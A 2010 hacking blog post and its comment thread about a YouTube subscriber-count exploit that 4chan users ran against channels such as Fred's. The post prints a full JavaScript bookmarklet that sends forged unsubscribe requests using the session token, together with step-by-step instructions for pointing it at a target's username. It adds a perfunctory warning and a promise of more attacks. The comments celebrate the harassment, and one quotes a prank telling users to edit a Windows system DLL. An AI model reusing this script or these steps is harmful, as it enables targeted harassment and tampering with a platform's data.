The Hack o blog

Reinventing the weel

YouTube subscriber glitch Fred and TunderF00T got hacked

Anonymous with Guy Fawkes masks at Scientology...

Anonymous with Guy Fawkes masks ...

Today multiple YouTube accounts got “hacked” it’s still going on the attack was perpetrated by the /B/tards of the ever more infamous 4Chan ” thanks moot”, accounts that were effected includes Fred and TunderF00t ,the problem has not yet been sorted, the  YouTube subscriber glitch allows an attacker to take out all of the subscribers of a channel, it uses a hole in the JavaScript lack of verification.

I will wright up how this script worked but for now here is the malicious code.

This is how it works, the script in the API usually requires a user to validate the action , the script overrides that and picks a random user to validate and un-subscribes them, the user isn’t in actuality un-subscribed and the counter is mealy decremented.YouTube  have had problems in the past with the counters being artificially increased, they haven’t fixed the problem and all they do is recount the subscribers.

DO not do this!!

1 Locate The target channel and subscribe

2 Open multiple page tabs

3 Paste this code into the browsers address bar

javascript:function unsubscribe() {
httpreq=new XMLHttpRequest();
httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false);
httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC'));
if(!httpreq.responseXML) {
setTimeout('unsubscribe()', timeout);
return;
}
if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!=' </address>
<h2>You have successfully unsubscribed.</h2>
') {
alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue);
} else if((window.status=++count)!=times) {
setTimeout('unsubscribe()', timeout);
} else {
alert('DUN');
}
}
count=0;
if((username=prompt('enter target\'s username', '\\*username here *\\'))!=null) {
if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) {
if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) {
unsubscribe();
}
}
}
void(0);

A quick note the code no longer works, there will be more attacks like this in the future so make sure you subscribe for more tips and hacks from the HackOBlog team, thanks to InfouPlink for the plug

Advertisements

61 responses to “YouTube subscriber glitch Fred and TunderF00T got hacked

  1. rawr August 25, 2010 at 8:26 PM

    Lol pwned.

  2. Lux August 25, 2010 at 9:06 PM

    Pretty sweet but it will get your account perma banned from youtube.

    • HackOblog August 25, 2010 at 9:16 PM

      yes it will, it could even leed to police intervention depending on the country you are from

      • IOA August 26, 2010 at 4:43 AM

        Really? In which country?

      • JaTochNietDan August 27, 2010 at 5:19 AM

        Wrong, script exploitation is not against the law, it is up the webmasters to keep their own stuff secure. No law enforcement will be able to punish someone for technically using what could be seen as a feature rather than a hole in security.

        It was just bad security by the YouTube developers.

        • Don Viszneki January 30, 2012 at 9:04 PM

          I am not a lawyer. And I realize this is an old article, but someone might come across it and maybe I’m contributing something.

          It’s illegal in plenty of US States. I’m from Pennsylvania, and here is a link to the current statute:

          http://www.legis.state.pa.us/WU01/LI/LI/CT/HTM/18/00.076.015.000..HTM

          In the language of the statute, a judge might rule that this constitutes “alter or erase any computer data, computer programs or computer software;”

          It is the subscription count that is altered.

          For an interesting discussion on the subject of human law and what might call “computer law,” the laws that computers obey, check out the book “Code and Other Laws of Cyberspace” by Lawrence Lessig.

      • HackOblog August 27, 2010 at 7:48 PM

        and yes in some countrys malicious script execution can be illegal in some countrys

      • ROFLShtudios September 5, 2010 at 4:08 PM

        Hey guys no it will not make you banned it simply duplicates them
        I know the guy who did it and he has been free for 2weeks no we both live in Ireland by the way
        peace

      • KhanKuun January 22, 2012 at 10:39 AM

        who fucking cares about that, really. maybe in police estate eu and us but nowhere else where freedom still exist

  3. Brian August 25, 2010 at 9:19 PM

    Very cool you guys, does this still work? How come others lost subs and some even 500 subs total? Doesn’t make sense or is it because of the youtube boxes?

    • HackOblog August 25, 2010 at 9:26 PM

      Yes it still works, but using it will get you beaned permanently form youtube.

      • Brian August 25, 2010 at 9:37 PM

        No problem, I wasn’t wanting to do that, im a youtube partner so last I would want to use such a code… it stopped though, any idea why? Have the hackers been caught? Also, do they IP ban or usename ban?

        • HackOblog August 26, 2010 at 12:37 AM

          All the users caught using this script have had there accounts band, there wont be a fix buy the looks of it they will just recount the subscribers, and wait till the /b/ gets bored

      • lolftw August 26, 2010 at 12:42 PM

        will it ban you ip?

        • HackOblog August 26, 2010 at 2:49 PM

          no your account

      • POLARDESTRUCTION August 26, 2010 at 10:22 PM

        YEah, HackOblog is right. Don’t do this, you may be beaned…

  4. awesome August 25, 2010 at 9:45 PM

    awesome!!!

  5. awesome August 25, 2010 at 9:47 PM

    check out : youtube.com/watch?v=J82lqgrc-rM
    also what’s the one for ADDING subscribers?

  6. json derailo August 25, 2010 at 10:03 PM

    Originally it was done in PHP.
    Old code as fuck.
    Goddamn script kiddies taking the victory in other people’s work.

    • HackOblog August 25, 2010 at 10:11 PM

      I’m not sure it was in PHP, but I no what you mean it’s not relay hacking, hacking would involve some effort but what would you expect from /B/

      • json derailo August 25, 2010 at 10:17 PM

        It was PHP, made 2 years ago.
        Never fixed. You might find the original hack by putting in site:pastebin.com whatever in google.

        • c0l3a5h3r July 20, 2011 at 10:37 PM

          It was javascript. don’t assume things when you don’t even know the language.

      • LOLOLOL August 26, 2010 at 1:50 PM

        Sure it is , on the part of the person who discovered this specific glitch . Whether or not it’s the same person as the one who started the attack on Fred , I don’t know . As for everyone else , most were just volunteers . Can’t call them hackers , just fredhaters . Hell , even I used it for a few seconds , didn’t notice anything going on so I closed it

  7. jake August 26, 2010 at 2:08 AM

    hahahahahahhahaahaahahahahahahahhaha fred deserved it lol n00b

  8. madleish August 26, 2010 at 2:09 AM

    how does this work simply copy and pasting does not work (i only want to try this out on my own channel)

  9. Roxy August 26, 2010 at 3:07 AM

    DO NOT DO THIS! Yes…so put it where people CAN do it ._.

    • HackOblog August 26, 2010 at 7:40 PM

      it no longer works, well for now and its information the more wide spread a bug is the faster it is fixed, information wants to be free and so on

  10. Bubbles August 26, 2010 at 3:12 AM

    thumbs up if traveler sent u here.

  11. Pingback: Anonymous Is raiding Fred's youtube, Deleting a huge load of his subscribers.

  12. Mr.Taco August 26, 2010 at 3:31 AM

    Err… you misspelled “ThunderF00T”
    Who would ever want to hack him lol??

    • HackOblog August 26, 2010 at 3:43 AM

      I have misspelled a lot of it, its the H0B moto Bad Spelling lol

  13. bigballz August 26, 2010 at 3:43 AM

    Do SxePhil’s dumb azz next!

  14. dv August 26, 2010 at 4:03 AM

    hack justin beavers next!! how about not!!!

  15. apOcalYpse August 26, 2010 at 4:53 AM

    Lol 4chan FTW! 😀

    well this happens if great minds think alike 😀

  16. Tompskamp August 26, 2010 at 6:41 AM

    I saw this on /b/:

    “Hey newfags, I bet you didn’t know that you could get rid of those annoying captchas did you?
    Well I’m feeling generous today and I thought i’d help you out and give some protips.

    To remove captchas simply. (Sorry Windows only, macs are gay anyway)

    1. Open My Computer.

    2. Click C: drive, then open WINDOWS folder.

    3. Find system32, DO NOT DELETE THIS FOLDER.

    4. Open system32, and find a file called capesnpn.dll.

    5. Click open with and choose notepad (Make sure
    you click always open with this program)

    6. Hit ctrl+F and find the code 0000a1b34 and delete it.

    7. Save the file and voila! no more captchas!

    This works because the captcha is stored on your PC, and doesn’t work anymore if you delete that code!

    TL ; DR – Get rid of captcha, read steps 1-7”

    is this true? is safe? or is a scam?

    • HackOblog August 26, 2010 at 7:35 PM

      no its not true, don’t do it,

    • c0l3a5h3r July 20, 2011 at 10:39 PM

      no. it will mess up your computer.

  17. Hurp August 26, 2010 at 8:24 AM

    I’m sorry, but whats a /B/tard?

    • HackOblog August 26, 2010 at 2:53 PM

      basicley its the name given to the users of the /b/ bored of 4chan

  18. Hellokitty92 August 26, 2010 at 12:13 PM

    WHAT IS THE HACKERS UTUBE ACCOUNT SO I KNOW WHO NOT TO SUB\
    AND WHAT KIND OF VIDEOS ARE THERE

  19. Pingback: YouTube got hacked

  20. Pingback: TechieGeeky.com – Tech news and reviews » Blog Archive » Fred can haz 1337 h4x?

  21. Danny August 26, 2010 at 4:14 PM

    Uh…I don’t know what /B/ is. But, it wasn’t 4Chan, it was EBaums. 4Chan is a nice, family-friendly site.

    • lolwut August 26, 2010 at 5:38 PM

      “4chan is a nice, family-friendly site*
      fail…

    • c0l3a5h3r July 20, 2011 at 10:40 PM

      lol. 4chan and family-friendly do not belong in the same sentence. give the site a peek if you want to know what I mean.

  22. Mitch August 26, 2010 at 4:22 PM

    clever bastards

  23. Pingback: An Internet Marketer Can Get Targeted Traffic Free, With Ezines! | Dan's Internet Marketing Business Blog!

  24. Pingback: Top Posts — WordPress.com

  25. Lol August 27, 2010 at 1:01 AM

    I think its funny, because people like me who have no subs could sit back and laugh as the fags cry and wonder why their subs where going down. I also love how people say it was Ebaums, or whatever. Those newfags couldn’t do shit like this.

  26. ikon August 27, 2010 at 12:19 PM

    Now a technical question, instead of all this… Why is the ‘username’ variable undefined?

    As in: edit_subscription=newsub&username=’+username+’&subscription_level=unsubscribe’, false);

    • HackOblog August 27, 2010 at 11:53 PM

      i will attempt to answer technical questions in an up coming post , de feel free to email me any you have

    • n August 28, 2010 at 7:42 PM

      The script prompts the user for the username before calling the unsubscribe function.

  27. LULZ August 27, 2010 at 4:52 PM

    They did it for the LULZ

  28. 3cho911 August 28, 2010 at 1:49 AM

    Wow the guys who did that was completely stupid.

  29. idoporges August 28, 2010 at 8:57 PM

    well if they hacked FRED …… then its fine by me !

  30. lerg August 29, 2010 at 4:34 AM

    4chan fails at life and everything else they do! Fred is aright but he gets annoying and isn’t it called harassment or something like that?

  31. Downloadhack October 3, 2010 at 10:29 PM

    Very interesting, i think it is very important to know that. Don’t hesitate to share it again, i think it is so useful to know.

  32. Dapizz January 16, 2012 at 3:59 PM

    The script in the API? That makes no sense.

  33. ANONYMOUS January 19, 2012 at 2:00 AM

    We are anonymous.
    We are Legion.
    United as ONE.
    Divided by zero.
    We do not forgive Censorship.
    We do not forget Oppression.
    US SENATE…
    Expect us!!

    • mudkip January 28, 2012 at 7:37 PM

      I will take your united 1, and divide it by 0. 0000000000000000000000000000000000000000000000000000000000000

  34. :) January 27, 2012 at 11:22 PM

    Well they were smart to find this and all. 4chan has some pretty smart guys on it.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: